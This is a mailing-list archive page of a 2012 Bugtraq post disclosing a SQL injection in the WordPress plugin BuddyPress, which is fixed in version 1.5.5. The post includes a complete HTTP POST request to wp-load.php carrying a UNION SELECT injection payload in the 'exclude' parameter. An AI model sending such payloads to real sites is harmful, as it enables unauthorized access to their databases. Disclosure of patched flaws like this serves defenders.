[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL injection in Wordpress plugin Buddypress

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL injection in Wordpress plugin Buddypress
From: ivan_terkin@xxxxxxxxx
Date: Sat, 31 Mar 2012 17:27:57 GMT

Hi,

I would like disclosure SQL injection vulnerability if Buddypress plugin 
affecting last versions. This issue was reported to developers and resolved in 
1.5.5 version. So, I suggest all having this plugin in their blogs update to 
last version, if you haven't done it yet. Example of POST message with sql 
injection is below.

POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded

action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+

Prev by Date: [SECURITY] [DSA 2442-2] openarena regression
Next by Date: [SECURITY] [DSA 2398-2] curl regression
Previous by thread: [SECURITY] [DSA 2442-2] openarena regression
Next by thread: [SECURITY] [DSA 2398-2] curl regression
Index(es):
- Date
- Thread